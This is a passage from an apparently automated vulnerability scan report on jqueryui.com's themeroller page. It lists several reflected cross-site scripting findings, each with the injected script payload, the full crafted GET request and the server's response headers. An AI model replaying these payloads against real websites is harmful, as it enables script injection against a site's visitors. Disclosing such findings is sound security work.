55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dedb6"><script>alert(1)</script>f1dea2bcac was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFFdedb6"><script>alert(1)</script>f1dea2bcac&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120319
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88db2"><script>alert(1)</script>4192bd9f2a0 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B1000088db2"><script>alert(1)</script>4192bd9f2a0&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 316fc"><script>alert(1)</script>934e76f5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF316fc"><script>alert(1)</script>934e76f5e&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120316
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b5e"><script>alert(1)</script>d56abac4e9f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333f9b5e"><script>alert(1)</script>d56abac4e9f&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c4d"><script>alert(1)</script>6643b1f4f9e was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFFf5c4d"><script>alert(1)</script>6643b1f4f9e&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e03"><script>alert(1)</script>652973ad3a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif72e03"><script>alert(1)</script>652973ad3a&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120319
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e1d"><script>alert(1)</script>b18d92c30eb was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%51e1d"><script>alert(1)</script>b18d92c30eb&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120320
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e74"><script>alert(1)</script>2a56f0acf06 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bolde4e74"><script>alert(1)</script>2a56f0acf06&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120257
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f91a5"><script>alert(1)</script>c8880d7a410 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCf91a5"><script>alert(1)</script>c8880d7a410&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73e9d"><script>alert(1)</script>ab4376d587b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666673e9d"><script>alert(1)</script>ab4376d587b&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86ff"><script>alert(1)</script>44c93a3107d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFFc86ff"><script>alert(1)</script>44c93a3107d&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b3"><script>alert(1)</script>16217d3125f was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000803b3"><script>alert(1)</script>16217d3125f&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da533"><script>alert(1)</script>98ab798f7d6 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
